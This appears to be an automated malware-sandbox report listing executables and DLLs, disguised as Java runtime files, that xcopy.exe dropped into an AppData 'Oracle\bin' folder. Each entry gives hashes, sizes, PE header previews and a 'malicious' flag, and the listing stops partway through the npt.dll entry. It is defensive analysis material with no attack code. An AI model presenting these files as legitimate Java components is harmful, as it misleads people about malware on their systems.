                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):172160
                                                                                                                                                                                                                                  Entropy (8bit):6.607037131587982
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:RtGMrDdbJ2hvUKb4GPanaP5tsN7Ra3mwoXJum6xq+Mvz08x7xo:vGMrDdbJQvUm4GPOWyLXJ3SMvz6
                                                                                                                                                                                                                                  MD5:C05198384B1A29D40973078185620016
                                                                                                                                                                                                                                  SHA1:FC6C1995FA4E7D7D7913F4635023E815B04E4404
                                                                                                                                                                                                                                  SHA-256:C9CC896ED6BEFD7D69595325FBCC008A07A329ABB7CAC86D5BEA4D590846D3AC
                                                                                                                                                                                                                                  SHA-512:A0FFFD5E9A1A8049E92A1D643D4FC64767E1A1A0BA9C31FB2ED6F62FB07F4160F2EC7612018F8E6A4FB379A39CB4F65F73EB232B6E9B6DCD445A8ECC8E86EB7D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k<...R...R...R..r....R..rS...R..aS...R..rW...R..rV...R..rQ...R.[sS...R...S...R.[sV...R.[sR...R.[s....R.[sP...R.Rich..R.................PE..L.....d...........!....."...V.......).......@......................................b.....@..........................r..X....z.......................x...(..........0n..T...........................pm..@............@...............................text.... .......".................. ..`.rdata..d?...@...@...&..............@..@.data...4............f..............@....rsrc................h..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8062632606189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:mCaYqJkYZqobWRYCzT7J3pj34fNw7ynY2NIYi1ohkPxh8E9VF0Nypf6m:AYq6YZqoqRB7iuynY2aYiekPxWE7f5
                                                                                                                                                                                                                                  MD5:D9609B46FCB0486FF635400F34701574
                                                                                                                                                                                                                                  SHA1:C9D0D4232B17DA35C76082CF6998106C654C75C3
                                                                                                                                                                                                                                  SHA-256:FCB68AFA6B7C18CACFFD5609539DA0AFC3CA4D2019DAA7C598DE6E60DA1E5C3B
                                                                                                                                                                                                                                  SHA-512:3D15A0F64EFECE32F6D60CE361DB2C79D4A757051E7BFBF6AF89B1C93F9050132BCBA0FE9DDD2E8823CE2CA5F42144196D575D8AD3B4E0360FD465A768F990E8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W...6z.6z.6z.N..6z..N{.6z.]{.6z.6{.6z..N..6z..N~.6z..Ny.6z.)O~.6z.)Oz.6z.)O..6z.)Ox.6z.Rich.6z.........PE..L.....d...........!.........................0...............................p...... .....@..........................8..<....9..d....P...............0...(...`......84..T...........................x3..@............0...............................text...k........................... ..`.rdata.......0......................@..@.data........@.......(..............@....rsrc........P.......*..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37504
                                                                                                                                                                                                                                  Entropy (8bit):6.783630059604455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:0o9n0iikntdDqg/SJ7z4qcIB16OluBH4UJuYi5KEPxWE5N:99n0iiktx3/SJAtV4Uc7gEPx1
                                                                                                                                                                                                                                  MD5:EB5C0CFDC592A244D6C3A0ECC59C0D74
                                                                                                                                                                                                                                  SHA1:F24775A4BE2B6260D4C4E4EB02ADD0AA1EC9D857
                                                                                                                                                                                                                                  SHA-256:7308B4CCCF16597DD9B2B06683685EF1D45B80DDCB414CC2BA311BBECCF1E133
                                                                                                                                                                                                                                  SHA-512:5F59DD5E6623DCA84A490A137415698BE513AE32ABA1FA1DBE098D40F3EE0A6449C6A6A5557BE21B2BE481B014BF474D1DE44CA373C28A4F5A844CDAFC8170E7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$...`..`..`..i...j......b......l......j......c..t...e..`..0....a....l....a...r.a....a..Rich`..................PE..L.....d...........!.....>...,.......E.......P............................................@.........................0[.......e.......................j...(......4...hV..T............................U..@............P..@............................text...y<.......>.................. ..`.rdata..&....P.......B..............@..@.data...d....p.......`..............@....rsrc................b..............@..@.reloc..4............f..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33408
                                                                                                                                                                                                                                  Entropy (8bit):6.808065830698542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wHGFhXcZdv31axFDQiuujPklUn0JmXQj3gN+t6EeLWcbIYi1oWKPxh8E9VF0NyjC:wmPuHabDQ2klU0sXq4EeKZYiFKPxWEFC
                                                                                                                                                                                                                                  MD5:A732222C7E321B96D7868EBC7C345042
                                                                                                                                                                                                                                  SHA1:F7DADC3B4145FD6C73C327AAC9EE471E2FA1D303
                                                                                                                                                                                                                                  SHA-256:DF1098F2D41393D843B7174E085F70C608A6AACE761E937B1775A9019BD8BDC8
                                                                                                                                                                                                                                  SHA-512:590DEC2C14D8CFF7AB7E8208F9D68E98D8CFFF8BDA0F43D83E8AACB21B0516A1205D5A4FC7312484A27EA0499AB6FEEFA1DA5E5D406771029F2E31FD4DC7B7C7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.Ck..-8..-8..-8...8..-8k.,9..-8k.(9..-8k.)9..-8k..9..-8..,9..-8..,8?.-8..(9..-8..)9..-8..-9..-8...8..-8../9..-8Rich..-8........................PE..L.....d...........!.....8...(......]?.......P...........................................@.........................@X.......].......................Z...(......x...@S..T............................R..@............P...............................text...e6.......8.................. ..`.rdata.......P.......<..............@..@.data...t....p.......P..............@....rsrc................R..............@..@.reloc..x............V..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.820987576744676
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0MNWbe0J4rLJapjVLzq82Hdef5OFIYi1ozNNPxh8E9VF0NyhITuT:0MNWbe0484Mf59YimNNPxWEXPT
                                                                                                                                                                                                                                  MD5:06BE7D4F31D3C96B165DBEF7EF4A8B5A
                                                                                                                                                                                                                                  SHA1:32C44FB56194C9723E0C92F63CE479C3AF014CF6
                                                                                                                                                                                                                                  SHA-256:40D582C867C374314E52915AEE63FC50654C3DF742B024702DC0395D53225730
                                                                                                                                                                                                                                  SHA-512:6A58B2D7EC6D907763A625BC0AAABE486585B16D0E9E247FABCD64A83A3CC65212BF83FBE2C25045E2EE281C860AC2171A9112E876DD70A4D4ADDCA76E2E6696
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`......I!....@..................................&.......@..\............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.823937787322992
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:W8NWbeEJ4rLJaEujflLq828MleflOHIYi1oemZVPxh8E9VF0NyPmNl:W8NWbeES38YUfl3YiYZVPxWEJi
                                                                                                                                                                                                                                  MD5:3F14F135972AAEF68EFD6231FCF1986B
                                                                                                                                                                                                                                  SHA1:5FE994D6D718D0578D985A1EF5ECB5D3E4ED58CC
                                                                                                                                                                                                                                  SHA-256:14E31AF6ACDB81BC835ACCB327E5346AB191829988F3CD9A5BA2DAF8B446F1E8
                                                                                                                                                                                                                                  SHA-512:791F3135BA66B13EBBB8294C241147ED89F5ED1BAB594054556B611CB091C7BF0858086516B736BA3DB6293B7F21CF0D72785C180BF9FBD9820F63B54418A49A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`......Z.....@..................................&.......@..T............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8271249514534915
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:w8NWbeEJ4rLJaEujZmGLq82X3eflOZIYi1oTPxh8E9VF0NyS/Pm:w8NWbeESvZ84OflBYi2PxWEIXm
                                                                                                                                                                                                                                  MD5:3F1C5C61DAE853ED9038E4BDD5DD6395
                                                                                                                                                                                                                                  SHA1:E6097A6364B5FCDDF05D8BDF00C96C4AB58E89C2
                                                                                                                                                                                                                                  SHA-256:C27FE1201445489B30FFBFF031B22E52A01FC56812B9DAF9D6B0D24D614017DC
                                                                                                                                                                                                                                  SHA-512:4AD9EB3F86F040BC971BFF5EA20C977F547C368646B8852D651E8F19281205C35445924280A14990002D9BD3980E224D3F95A8CD8B27A3F810877AEC6B988ACA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`.......4....@..................................&.......@..T............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.821823289010758
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:G8F+beUJ4rLJaEujl9yq82LPefmO0IYi1o/5Pxh8E9VF0NyIUGo:G8F+beUSy80Gfm2YiU5PxWESho
                                                                                                                                                                                                                                  MD5:0DD2CB6FACDFD468665A3A2C362F33B3
                                                                                                                                                                                                                                  SHA1:8895EFDCF183DF1CAB94E3B4B66430854B8AE871
                                                                                                                                                                                                                                  SHA-256:E94865DAB77E95BBBA9B147E18881F0F0A1CC28715575154C3109043740EE6BF
                                                                                                                                                                                                                                  SHA-512:EACC00D883927E0FCCAFF53A0A252E30EFEF40A9FBFD28CCE3CD8D2CC85827DF6924F9C589B9F5A34FD8AFE49AF05B4A39D78C07F1B5D285FED926085327449B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`............@..................................&.......@..P............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):223360
                                                                                                                                                                                                                                  Entropy (8bit):6.5072198448423
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Yl7QdSigSmamt0VsoGM7S26QPxWwYbLDt2UGX84t2BjqBa9SzS+7kH0b6Bz2htCV:T8Sne0VCIZpWXohtm7BzwgVOiH
                                                                                                                                                                                                                                  MD5:BCADEE325B3EB9C4F2362AE59DFEEDB5
                                                                                                                                                                                                                                  SHA1:77F8ACDB6E02AD046CE4AA57331DB8E2DC494675
                                                                                                                                                                                                                                  SHA-256:5CA32CC7E0F170F20F20F93910BEC71B09423E87419B87D44806E82FADE29B63
                                                                                                                                                                                                                                  SHA-512:18DC9699480F259AD45746BF14670FB50336BAC1E2224B540C610181777802A398E0BB64A810E696539298E937FA2F62916AF6321DC74B37C3BEAF4B9260698F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|Q...?...?...?..e....?..e>...?..v>...?..e:...?..e;...?..e<...?.Ld>...?...>...?.Ld;...?.Ld?...?.Ld....?.Ld=...?.Rich..?.................PE..L.....d...........!................O....................................................@.........................@...h............p...............@...(......H.......T...............................@............................................text............................... ..`.rdata..@a.......b..................@..@.data...8E... ...*..................@....rsrc........p.......(..............@..@.reloc..H............,..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\management.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):40576
                                                                                                                                                                                                                                  Entropy (8bit):6.68958929409043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:plpSzOJ6Egd8886GM8jG0tJ1xcbC4fPYixPxWE2/i:WOBgdmMWGcJ1Gbt7xPxii
                                                                                                                                                                                                                                  MD5:D29327340A01A47B870606432E1CA9A4
                                                                                                                                                                                                                                  SHA1:901666816E7F4DA2F1F44ABABD6E9F40084BD07B
                                                                                                                                                                                                                                  SHA-256:A721F395D134F88E0D166B7B53BA752680F9E2325EC993752D731BF8445364AB
                                                                                                                                                                                                                                  SHA-512:FD2B374450AABB8C0BF2A822F5FDA701F40920391A76751CA3917B7FF11D03CD51DD9D91FF62E322F2068569AAF46D8523581DCD047194519C790C15AF97B4EB
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^.e6...e...e...e...e...ex..d...ex..e...ex..d...ex..d...ex..d...e...d...e...d...e...eU..e...d...e...d...e...e...e...d...eRich...e........................PE..L.....d...........!.....2...D......$8.......P.......................................O....@.........................._.......y.......................v...(...........[..T...........................HZ..@............P..D............................text....1.......2.................. ..`.rdata..H2...P...4...6..............@..@.data...t............j..............@....rsrc................l..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):580736
                                                                                                                                                                                                                                  Entropy (8bit):6.433079705189656
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:gKCi3iPfOKtJd2/SilKlKpg/SgXWiO9fgRzkprFDvBLdkxD:mfOKtJd2/SilKlKpLgXWh9fgoFDvBLdm
                                                                                                                                                                                                                                  MD5:F53D643039D30BA967A07235ADB188A1
                                                                                                                                                                                                                                  SHA1:30FCFD99223B7C6546EA17BA53A62D02A652D3F1
                                                                                                                                                                                                                                  SHA-256:B15C6EEAAC68F383A4ADF5150C3A267A755683C06C8FAD6F6EB0063CC4F8A772
                                                                                                                                                                                                                                  SHA-512:4BBE6AFB6090B55DFDC5F5E68709F9FC978CF18F789F2E6E0C700E7B756F76C4FC5E05F20FB06EC80032E207BA2ECACDC9D13808D06A12D7223B1EA0C1EB13A8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."......."...#..."..#..."...#..."...'..."...&..."...!...".y.&...".y."...".y.....".y. ...".Rich..".........PE..L.....d...........!................................................................fi....@.............................$.......d........................(..............T...........................P...@...............t............................text............................... ..`.rdata..............................@..@.data...l...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):439208
                                                                                                                                                                                                                                  Entropy (8bit):6.6510194969003855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:IdyX+9Tk5fb+5J56HgGwKz2zRThUgiW6QR7t5s03Ooc8dHkC2es+Fpyd:LX+9TkR+5J56AjKz2VA03Ooc8dHkC2eu
                                                                                                                                                                                                                                  MD5:FDD04DBBCF321EEE5F4DD67266F476B0
                                                                                                                                                                                                                                  SHA1:65FFDFE2664A29A41FCF5039229CCECAD5B825B9
                                                                                                                                                                                                                                  SHA-256:21570BCB7A77E856F3113235D2B05B2B328D4BB71B4FD9CA4D46D99ADAC80794
                                                                                                                                                                                                                                  SHA-512:04CFC3097FBCE6EE1B7BAC7BD63C3CFFE7DCA16F0EC9CD8FE657D8B7EBD06DCBA272FF472F98C6385C3CFB9B1AC3F47BE8CA6D3EA80AB4AEED44A0E2CE3185DD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P..%.d.v.d.v.d.v...w.d.v..~v.d.v.d.v.d.vv..w.d.vv..w.d.vv..w.d.vv..w.d.vv..w.d.vv..v.d.vv..w.d.vRich.d.v................PE..L..."............."!.........~...............0......................................h.....@A.........................\......Hc...........................'......$7..hX..T............................W..@............`..@............................text............................... ..`.data...L(...0....... ..............@....idata.......`.......8..............@..@.rsrc................P..............@..@.reloc..$7.......8...T..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22952
                                                                                                                                                                                                                                  Entropy (8bit):6.5208905095857865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:nVWijIvQX2EJFJwjfXCtWcg5gWWDKLHRN7goj05seyR9zNin+2ydL:nci1GEnJqX1cAtj05sN9zI+2wL
                                                                                                                                                                                                                                  MD5:DB1A03F2A6082DE4524FE5AEDCF4E761
                                                                                                                                                                                                                                  SHA1:E8C061378EFB1889CF1E8C70FBB6622C4D31F404
                                                                                                                                                                                                                                  SHA-256:100507724EC41F00B4C81896CBD12A8CAEE4DCC6593E87999D66F05AEB7BA19D
                                                                                                                                                                                                                                  SHA-512:EDA1C49AF6A75A36170E774B4DEED0A3D0F7A031075D070A02B5CB54BEF772BF9D6AB7D2BD352EE611DA1390F54C31B2B1E536645ADF7D35D733965F8B23D4A8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V...W...V.[V...V...W...V...W...V...V...V...W...V...W...V...W...V..7V...V...W...VRich...V........................PE..L...).v..........."!................@........0...............................p......6$....@A.........................*..J....@..x....P...............2...'...`..x.......T...........................X...@............@...............................text............................... ..`.data...0....0......."..............@....idata.......@.......$..............@..@.rsrc........P.......*..............@..@.reloc..x....`......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):167816
                                                                                                                                                                                                                                  Entropy (8bit):6.7867736595063075
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:3ZiGNoZG+rRs3oJttTLmYv92DF36ihgyiaMiH6Aq6TNDTd0ANNsCJ:3ZNNoZL9ttTqpKMDnq6Tpd0LCJ
                                                                                                                                                                                                                                  MD5:54E49614B59D0AB117C149B837640565
                                                                                                                                                                                                                                  SHA1:DB9799F98FDC7E4C966BE3F9EF54455BEC2022A2
                                                                                                                                                                                                                                  SHA-256:DB10BA0E0672893F053823ABC3D6E8F0D2F07705878D34E8EF6CACFDA34881C1
                                                                                                                                                                                                                                  SHA-512:6ABB4BFD35188F2CE2EA482CA6E8D4C3BA466BDE3D1966931AB38A2979E620713810E2A024636B9E6947FA388CA76A7C4893924DC24B34F7D486C421752D1D39
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E....`...`...`.......`....i..`..c....`..c....`...`..e`..c....`..c....`..c....`..c....`..c....`..Rich.`..........PE..L................."!.....0...<...............@......................................6.....@A........................@8..@....Q.......`...............l...#...p..P...@]..T............................\..@............P...............................text............0.................. ..`.data... ....@.......4..............@....idata..d....P.......<..............@..@.rsrc........`.......J..............@..@.reloc..P....p.......N..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\net.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):89728
                                                                                                                                                                                                                                  Entropy (8bit):6.720303513765618
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:YKPhGI1Dm2s7PMJ1Y3GJvK9m+6i0R7sbDxAuum7Qh3KvGO7OW/PxZ:YKhGI1y2s7IY2FK9m+6i0KmBh3KvRnxZ
                                                                                                                                                                                                                                  MD5:6BE9951E8BE5DE319027B960E7CDF119
                                                                                                                                                                                                                                  SHA1:CD25D1A97734238F6139BB61716A273EDB6A2ADF
                                                                                                                                                                                                                                  SHA-256:CB0EF1F39DEC2019DD18347FDC772B07D0EE2A5B183A4F14CA2C0292FE5BC5A3
                                                                                                                                                                                                                                  SHA-512:1940BB95C62CE90B84CF774ED2ADAAFD3588E84C593BD6643D5E3B70E47CEE81E383AFE23105533FCD38468ACB6B92C493850A7655D3801DDC3F21F8201CD474
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................3............................X.....................H..X......X......X._....X......Rich...........PE..L.....d...........!.........n...............................................p......I.....@.........................@.......X'.......P...............6...(...`..T.......T...........................(...@.......................`....................text............................... ..`.rdata...R.......R..................@..@.data...d....@....... ..............@....rsrc........P......."..............@..@.reloc..T....`.......&..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):57984
                                                                                                                                                                                                                                  Entropy (8bit):6.691582292818982
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Pr+BbnfEVq+g7DMdojIIASPVFg2xnqqtvJ3fuQ0v8qXukhDHi9XXYiOPxWEpIE:Pr+BbnEsmoeKqmD0UqXhhDi9n7OPxn
                                                                                                                                                                                                                                  MD5:5ABFC7D72617230BED7563F782937D08
                                                                                                                                                                                                                                  SHA1:442BACED2A355CF1C725E682DDAEB277F248B181
                                                                                                                                                                                                                                  SHA-256:BBBD0EBE4408FC98E700B3BD0BA78C27CF08062374EA41C434F098C66455C899
                                                                                                                                                                                                                                  SHA-512:CDBB2958A87D2F5F580F81769F08D226F0F30667BE1FE3109268D0FC2A36E4DBFCD32762E8CBC183A4F814EA965C253A2FF5E724A977BF5838180F419AE011C2
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Hlb.Hlb.Hlb.A..@lb.*.c.Jlb.*.g.Clb.*.f.Blb.*.a.Nlb...c.Llb.\.c.Alb.Hlc..lb...f.Zlb...b.Ilb.....Ilb...`.Ilb.RichHlb.........................PE..L.....d...........!.....\...^.......a.......p......................................Go....@.........................0....+...............................(...........{..T............................{..@............p...............................text....[.......\.................. ..`.rdata..lK...p...L...`..............@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23168
                                                                                                                                                                                                                                  Entropy (8bit):6.794543549263149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8y30/NyLxN6QNGwJ5j4Jtn7Erqdju0IYi1omQtPxh8E9VF0NyB7R:c/N+7Gw0ErqZWYiKPxWE3N
                                                                                                                                                                                                                                  MD5:1C26E7A34E99455A5BF591775CC08584
                                                                                                                                                                                                                                  SHA1:9C9A2A7E2C9AF9E8DD156749222ABAC6CDCC4D64
                                                                                                                                                                                                                                  SHA-256:A65A26F8AAE2C9D244914FCFFB5C31F6CB7F3847F5732B27E06351677EAE61D3
